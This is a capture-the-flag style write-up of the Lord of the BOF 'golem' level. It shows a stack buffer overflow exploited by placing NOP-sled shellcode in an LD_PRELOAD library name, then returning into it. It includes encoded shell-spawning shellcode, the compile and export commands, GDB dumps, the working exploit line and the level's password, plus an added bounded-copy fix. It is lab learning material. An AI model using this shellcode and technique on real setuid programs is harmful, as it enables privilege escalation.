-----------------------------------------------------------------------------------------------------------------------------
Sur3x5f Report - LOB Level11 [ Skeleton -> Golem ]
-----------------------------------------------------------------------------------------------------------------------------
At last, the golem challenge. Let's take it on!
[skeleton@localhost xodnr]$ cat golem.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - golem
        - stack destroyer
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strcpy, memset: missing in the original listing, added so it compiles cleanly */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // stack destroyer!
        memset(buffer, 0, 44);
        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48)); // ugh, this damn thing
}
Everything gets zeroed. But if you compare the source with the previous level, one thing is missing: the part that wipes the environment variables. That does not make this an eggshell problem, though.
I puzzled over it all night, and around 5 a.m. at the hacking camp I asked Hyeok and got a hint: use the LD_PRELOAD and LD_LIBRARY_PATH environment variables. These variables are used to specify shared libraries.
If you put something in them, the loader looks there first, and only if it finds nothing there does it consult the PATH environment variable; that is their role.
Like other environment variables they leave residue on the stack that we can use, and that residue is what the attack relies on.
So: create a shared library file whose file name consists of NOPs plus shellcode, register it in the LD_PRELOAD environment variable,
find its address, and return there so that a shell pops.
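As an added example (not from the original writeup or the LOB challenge source), here is the bounded copy golem.c should have used instead of strcpy: the defect is the unchecked copy of argv[1] into a 40-byte buffer, and the two memset calls that run afterwards do not help because they deliberately leave buffer+44..+47, where the saved return address sits, untouched. BUF_SZ, copy_arg_bounded and overflow_bytes are names chosen for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SZ 40   /* same size as golem's buffer[40] */

/* Hardened replacement for golem's strcpy: refuse anything that does not
   fit, terminating NUL included.  Returns 0 on success and -1 when src is
   too long; dst is left untouched on rejection (fail closed, no truncation). */
int copy_arg_bounded(char *dst, size_t dst_sz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_sz)
        return -1;           /* would overflow dst */
    memcpy(dst, src, n + 1); /* n + 1 copies the terminating NUL as well */
    return 0;
}

/* How many bytes past the end of a BUF_SZ buffer an unbounded strcpy of src
   would write (0 when it fits).  The 48 bytes golem demands in argv[1] need
   49 bytes with the NUL, so they reach 9 bytes past the buffer, through the
   return address at buffer+44..+47 that the level overwrites. */
size_t overflow_bytes(const char *src)
{
    size_t need = strlen(src) + 1;
    return need > BUF_SZ ? need - BUF_SZ : 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SZ];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    if (copy_arg_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long: %zu byte(s) would spill past the buffer\n",
                overflow_bytes(argv[1]));
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```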
Addendum ---------------------------------- >
http://linux-virus.springnote.com/pages/1855278
http://codefactory.zc.bz/224
Golem zeroes the entire stack region. Looking at it in GDB, even the argv[0] we used in the previous level is unusable;
golem eats all of it. The way around it is the LD_PRELOAD (or LD_LIBRARY_PATH) environment variable.
If you define a long value in LD_PRELOAD, a little residue of it is created on the stack. The variable is consumed while the program starts up,
and the residue left behind by that process is never cleared.
So while a program normally refers to the standard libraries when nothing is registered, LD_PRELOAD lets you
redefine functions of your own and have them used instead.
Program start -> load the normal shared libraries
With LD_PRELOAD defined: program start -> load the LD_PRELOAD shared library
That is how it works.
We build a shared library file and register it in LD_PRELOAD; when registering it, let's try making the file name (and so the variable's value)
consist of NOPs plus shellcode.
When compiling with GCC you have to use the -fPIC -shared options.
[gate@localhost gate]$ man gcc | grep fPIC
-fpcc-struct-return -fpic -fPIC -freg-struct-return
[gate@localhost gate]$ man gcc | grep shared
-llibrary -nostartfiles -nostdlib -static -shared
-mpa-risc-1-0 -mpa-risc-1-1 -mkernel -mshared-libs
-mno-shared-libs -mlong-calls -mdisable-fpregs
-fshared-data -fshort-enums -fshort-double
vents linking with the shared libraries. On other
Produce a shared object which can then be linked
shared object. Warn about any unresolved refer
shared libraries. This option is not fully func
shared libraries. This is the default for all PA
this compilation be shared data rather than private
operating systems, where shared data is shared be
shared library.
-fPIC is the option used when building a shared library file;
-fpic can have problems depending on the CPU, whereas -fPIC compiles quickly regardless of CPU.
-shared, as I understand it, tells the compiler to produce a dynamic library file.
So to build the library file to register in LD_PRELOAD:
gcc -fPIC -shared -o `nop + shellcode` file.c
then register it with export LD_PRELOAD=`nop + shellcode`.
End of addendum ---------------------------------- >
[skeleton@localhost xodnr]$ ll
total 40
-rw------- 1 skeleton skeleton 12288 Aug 27 21:44 core
-rwxrwxr-x 1 skeleton skeleton 12199 Aug 27 18:02 gole
-rw-r--r-- 1 skeleton skeleton 539 Aug 27 18:02 gole
-rwxrwxr-x 1 skeleton skeleton 5548 Aug 27 21:50 ld
-rw-rw-r-- 1 skeleton skeleton 13 Aug 27 18:04 ld.c
[skeleton@localhost xodnr]$ gcc -fPIC -shared ld.c -o `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
When registering it in the environment variable you must give the exact path; otherwise you may get a file name error from somewhere else.
[skeleton@localhost xodnr]$ pwd
/home/skeleton/xodnr
[skeleton@localhost xodnr]$ export LD_PRELOAD=/home/skeleton/xodnr/`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
Now set the return address to the address of LD_PRELOAD and attack.
So let's find the address of LD_PRELOAD. First, start the debugger.
[skeleton@localhost xodnr]$ gdb -q golem
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r
Starting program: /home/skeleton/xodnr/golem
argv error
Program exited normally.
(gdb) r `python -c 'print "\xbf"*48'`
Starting program: /home/skeleton/xodnr/golem `python -c 'print "\xbf"*48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Breakpoint 1, 0x8048517 in main ()
(gdb) x/50x $esp
0xbffffa0c: 0xbfbfbfbf 0x00000000 0x00000000 0x00000000
0xbffffa1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffabc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffacc: 0x00000000 0x00000000
(gdb)
0xbffffad4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffae4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb94: 0x00000000 0x00000000
(gdb)
0xbffffb9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbdc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc5c: 0x00000000 0x00000000
(gdb)
0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd24: 0x00000000 0x00000000
(gdb)
0xbffffd2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffddc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdec: 0x00000000 0x00000000
(gdb)
0xbffffdf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb4: 0x00000000 0x00000000
(gdb)
0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff7c: 0x00000000 0x00000000
(gdb)
0xbfffff84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffa4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffe4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffff4: 0x00000000 0x00000000 0x00000000 Cannot access memory at address 0xc0000000
Whoa......... the stack is completely empty. Hyeokju's hint was to look much further back, far beyond this region.
So, to be generous, I looked at the stack from -3000:
(gdb) x/50x $esp-3000
0xbfffee54: 0x00000000 0x0000038c 0x00000000 0x000000cb
0xbfffee64: 0x0000059b 0x00000707 0x00000557 0x00000000
0xbfffee74: 0x00000564 0x00000000 0x00000301 0x0000048e
0xbfffee84: 0x00000550 0x00000000 0x0000067f 0x00000000
0xbfffee94: 0x00000000 0x00000715 0x000005e9 0x0000060d
0xbfffeea4: 0x00000529 0x000003a4 0x00000351 0x000006cd
0xbfffeeb4: 0x000000b9 0x00000679 0x00000000 0x000005e1
0xbfffeec4: 0x00000141 0x00000503 0x00000072 0x0000062d
0xbfffeed4: 0x00000000 0x00000000 0x000005a3 0x0000021e
0xbfffeee4: 0x0000020d 0x00000608 0x00000000 0x00000000
0xbfffeef4: 0x00000706 0x000006f6 0x000006fc 0x0000041b
0xbfffef04: 0x00000701 0x0000062b 0x00000547 0x00000000
0xbfffef14: 0x00000000 0x00000000
(gdb)
0xbfffef1c: 0x0000052c 0x00000171 0x00000687 0x00000148
0xbfffef2c: 0x00000497 0x00000000 0x000002b9 0x00000629
0xbfffef3c: 0x000004f5 0x0000029b 0x00000725 0x00000639
0xbfffef4c: 0x000002ac 0x00000000 0x000006f1 0x00000000
0xbfffef5c: 0x000006a1 0x000004d4 0x000005c9 0x0000029f
0xbfffef6c: 0x000006a6 0x0000045f 0x000006dd 0x000004a6
0xbfffef7c: 0x00000000 0x00000620 0x0000051e 0x00000000
0xbfffef8c: 0x00000584 0x0000069c 0x00000716 0x0000054d
0xbfffef9c: 0x00000527 0x000004ed 0x000003a1 0x00000458
0xbfffefac: 0x00000466 0x0000063f 0x00000000 0x000001ca
0xbfffefbc: 0x00000000 0x0000027f 0x00000000 0x000006ba
0xbfffefcc: 0x0000055a 0x000002b6 0x000000d9 0x0000053d
0xbfffefdc: 0x00000252 0x000004bf
(gdb)
0xbfffefe4: 0x00000000 0x0000071a 0x00000673 0x000005fb
0xbfffeff4: 0x0000023f 0x00000653 0x00000000 0x00000189
0xbffff004: 0x000002a6 0x00000367 0x000003d7 0x00000340
0xbffff014: 0x000005fe 0x000006f3 0x0000056e 0x000004de
0xbffff024: 0x00000306 0x000006a5 0x00000145 0x000000f8
0xbffff034: 0x000000cc 0x000001c0 0x000005f1 0x00000457
0xbffff044: 0x00000712 0x00000703 0x00000226 0x00000513
0xbffff054: 0x4002bb0e 0xbffff128 0x400081e6 0x4002bad5
0xbffff064: 0x4002bad5 0x40013868 0x40014828 0x0000598c
0xbffff074: 0x00000432 0x0000013f 0x0000016e 0x000002f1
0xbffff084: 0x00000000 0x00000420 0x000006c0 0x0000052e
0xbffff094: 0x00005450 0x00000000 0x000004cd 0x00000000
0xbffff0a4: 0x00000000 0x400221c0
(gdb)
0xbffff0ac: 0x00000545 0x40023fd0 0x4001cd70 0x40014828
0xbffff0bc: 0x00000004 0x40014a98 0x00000002 0xbffff0e0
0xbffff0cc: 0x400221c0 0x40014a2c 0x03c40f19 0xbffff15c
0xbffff0dc: 0x4002995c 0x400221c0 0x40014828 0x4002bad5
0xbffff0ec: 0x4002bad5 0x40013868 0x40014828 0x0000590a
0xbffff0fc: 0x00000536 0x0000070b 0x00000167 0x00000555
0xbffff10c: 0x40001402 0xbffff1e0 0x40008134 0x40000c7d
0xbffff11c: 0x40024f23 0x40013868 0x40014828 0x00000f53
0xbffff12c: 0x4000a7fd 0x40014818 0x40014b50 0x00000007
0xbffff13c: 0x4000a74e 0x4010a1ec 0xbffff1e1 0x00000000
0xbffff14c: 0x00000180 0x400221c0 0x4010a710 0x00000000
0xbffff15c: 0x400221c0 0x40000474 0x00000000 0x40000824
0xbffff16c: 0x400002f4 0x40013c00
(gdb)
0xbffff174: 0x00000004 0x40014a98 0x00000004 0xbffff198
0xbffff184: 0x4001dd60 0x40014a34 0x056e90c5 0xbffff214
0xbffff194: 0x40024f23 0x4001dd60 0x40014828 0x000000bd
0xbffff1a4: 0x4002bb0e 0xbffff278 0x400081e6 0x4002bad5
0xbffff1b4: 0x4002bad5 0x40013868 0x40014828 0x0000187f
0xbffff1c4: 0x00000001 0x4001fe70 0x00000310 0x40023fd0
0xbffff1d4: 0x4001cd70 0x40014828 0x00000004 0xbffff218
0xbffff1e4: 0x4000a7fd 0x40014818 0x40014b50 0x40001402
0xbffff1f4: 0xbffff2c4 0x40008134 0x40000ec9 0x40025713
0xbffff204: 0x40013868 0x40014828 0x00001743 0x40024f23
0xbffff214: 0x4001dd60 0xbffff258 0x4000a970 0x40017000
0xbffff224: 0x40108980 0x400c0b00 0x00000000 0x40000ec9
0xbffff234: 0x400707e4 0x00000001
(gdb)
0xbffff23c: 0x00000000 0x00000031 0x40000664 0x00000000
0xbffff24c: 0x40000824 0x400002f4 0x40013c00 0x00000004
0xbffff25c: 0x40014a98 0x00000004 0xbffff27c 0x4001e4f0
0xbffff26c: 0x40014a34 0x00dc28f5 0xbffff2f8 0x40025713
0xbffff27c: 0x4001e4f0 0x40014828 0x40108980 0x40017000
0xbffff28c: 0x00000031 0x4010a1ec 0x40108980 0xbffff2b8
0xbffff29c: 0x4006fa3e 0x40108980 0x40017000 0x00000031
0xbffff2ac: 0x4010a1ec 0x00000001 0x40108980 0xbffff2cc
0xbffff2bc: 0x400711c7 0x40108980 0xbffff2fc 0x4000a7fd
0xbffff2cc: 0x40014818 0x40014b50 0x00000007 0x4000a74e
0xbffff2dc: 0x4010a1ec 0x0804859c 0x00000001 0x40014828
0xbffff2ec: 0x4001e4f0 0x4010a320 0x40025713 0x4001e4f0
0xbffff2fc: 0xbffff9b4 0x4000a970
(gdb)
0xbffff304: 0x40108980 0x00000400 0x4006c2e4 0x40014828
0xbffff314: 0xbffff9b4 0x4006428b 0x40108980 0x4010a1ec
0xbffff324: 0x4000ae60 0xbffffa54 0x00000000 0x00000000
0xbffff334: 0x00002fb2 0x00001000 0x00000018 0x4e5920c4
0xbffff344: 0x0000385c 0x40014828 0x00000018 0x000ed9c0
0xbffff354: 0x00000002 0xbfffe284 0xbfffe254 0xbfffe2cc
0xbffff364: 0x00001000 0xbfffe2cc 0x00000003 0x000f485c
0xbffff374: 0xbfffe3a0 0xbfffe300 0x40013ed0 0x00000808
0xbffff384: 0x00000000 0x00000000 0x0000675b 0x000081a4
0xbffff394: 0x0804859c 0x25000000 0x00000000 0x00000001
0xbffff3a4: 0x00000000 0x00000053 0x00008561 0x000081ed
0xbffff3b4: 0x00000001 0x00000000 0x40001402 0xbffff490
0xbffff3c4: 0x400081e6 0x400013e1
(gdb)
0xbffff3cc: 0x400013e1 0x40013868 0x400013a5 0x40000824
0xbffff3dc: 0x400013d3 0x40013c00 0x40014a88 0x0000000e
0xbffff3ec: 0x40013e80 0x400013d3 0x400014c4 0x00000000
0xbffff3fc: 0x00000520 0x4002bad5 0x400013e1 0x00000000
0xbffff40c: 0xbffff494 0x40000814 0x00000052 0x40000824
0xbffff41c: 0x400002f4 0x40013c00 0x00000004 0x40014a98
0xbffff42c: 0x00000003 0xbffff448 0x40000814 0x400140d4
0xbffff43c: 0x0b725f23 0xbffff524 0x400013a5 0x40000814
0xbffff44c: 0x40013c00 0x400002f4 0x40013c00 0x00000000
0xbffff45c: 0x00000000 0x00000004 0x40014a98 0x00000004
0xbffff46c: 0xbffff48c 0x40000674 0x400140d8 0x01ee5739
0xbffff47c: 0xbffff524 0x40000edc 0x20733868 0xffffffff
0xbffff48c: 0xffffffd0 0x00000000
(gdb)
0xbffff494: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff4a4: 0x00000000 0x00000000 0x00000000 0xbffff9e0
0xbffff4b4: 0x40009c50 0x00005207 0x4001a0dc 0x4001a0dc
0xbffff4c4: 0x00000000 0x00000000 0x00000001 0xbffff9d8
0xbffff4d4: 0xbffff9b3 0x0804859b 0x08048599 0x00000031
0xbffff4e4: 0xffffffff 0x40013c00 0x4001a0d4 0x40010c9e
0xbffff4f4: 0x40000814 0x400138d4 0x40001402 0x400002f4
0xbffff504: 0x080482d0 0x080482d0 0xbffff554 0x00000002
0xbffff514: 0x40023fd0 0x40013c00 0x4000ba15 0x40013868
0xbffff524: 0x40000814 0x400041b0 0x00000001 0xbffff53c
0xbffff534: 0x0804859c 0x000002c8 0x00000000 0x080482d0
0xbffff544: 0x00000000 0x00000000 0x00000000 0xbffff55c
0xbffff554: 0x400075bb 0x40017000
(gdb)
0xbffff55c: 0x00002fb2 0x40013868 0xbffff744 0x4000380e
0xbffff56c: 0x40014480 0x6d6f682f 0x6b732f65 0x74656c65
0xbffff57c: 0x782f6e6f 0x726e646f 0x9090902f 0x90909090
0xbffff58c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff59c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5ac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5bc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5cc: 0x90909090 0x90909090 0x90909090 0x90909090 // the NOP sled is here.
0xbffff5dc: 0x90909090 0x90909090 0x90909090 0x5e11eb90 // let's return here!
0xbffff5ec: 0x32b1c931 0xff0e6c80 0x01e98001 0x05ebf675
0xbffff5fc: 0xffffeae8 0x51c132ff 0x74303069 0x63306969
0xbffff60c: 0xe48a6f6a 0xe28a5451 0xce0cb19a 0x40000081
0xbffff61c: 0x40013868 0x4000220c
(gdb)
0xbffff624: 0xbffffb46 0x00000000 0x00000000 0x00000000 // the stack proper probably starts from here.
0xbffff634: 0x00000000 0x40014a00 0x00000000 0x00000000
0xbffff644: 0x00000000 0x00000000 0x00000006 0x00000000
0xbffff654: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff664: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff674: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff684: 0x00000001 0x00000000 0x00000001 0xbffff56c
0xbffff694: 0x00060000 0x00000000 0x00000000 0x00000000
0xbffff6a4: 0x00000001 0x00000000 0x00000000 0x00000000
0xbffff6b4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6c4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6d4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e4: 0x00000000 0x00000000
[skeleton@localhost xodnr]$ ./golem `python -c 'print "\xbf"*44 + "\xcc\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Ìõÿ¿
bash$ id
uid=510(skeleton) gid=510(skeleton) groups=510(skeleton)
bash$ exit
We got a shell...... I'm swearing and grinning at the same time, lol
[skeleton@localhost xodnr]$ cd ..
[skeleton@localhost skeleton]$ ./golem `python -c 'print "\xbf"*44 + "\xa8\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¨õÿ¿
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
The password printed correctly!